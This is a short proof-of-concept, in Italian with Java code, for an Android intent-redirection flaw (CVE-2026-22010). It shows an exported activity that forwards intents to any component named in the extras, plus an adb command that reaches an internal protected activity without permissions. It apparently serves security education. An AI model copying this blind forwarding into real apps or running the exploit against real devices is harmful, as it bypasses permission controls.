
Proof-of-concept per CVE-2026-22010 reindirizzamento degli intent Android: dimostra un'activity esportata che inoltra gli intent a componenti interni controllati dall'attaccante, aggirando i controlli dei permessi, con codice Java vulnerabile e passaggi di exploit adb.
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
@Override
protected void onCreate(Bundle b) {
super.onCreate(b);
Intent incoming = getIntent();
// Retrieve target component from extras
String targetPkg = incoming.getStringExtra("pkg");
String targetCls = incoming.getStringExtra("cls");
Intent forward = new Intent();
forward.setClassName(targetPkg, targetCls);
// Copy all extras from original intent
forward.putExtras(incoming);
startActivity(forward);
}
}
Un'attività Android esportata reindirizza ciecamente gli intent in ingresso a un componente specificato negli extra dell'intent. Un attaccante può creare un intent che induce l'app ad avviare un'attività interna protetta con dati controllati dall'attaccante, aggirando i controlli sui permessi.
Distribuisci l'app vulnerabile su un emulatore Android. Invia un intent tramite adb:
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity
L'attività interna viene avviata senza i permessi corretti.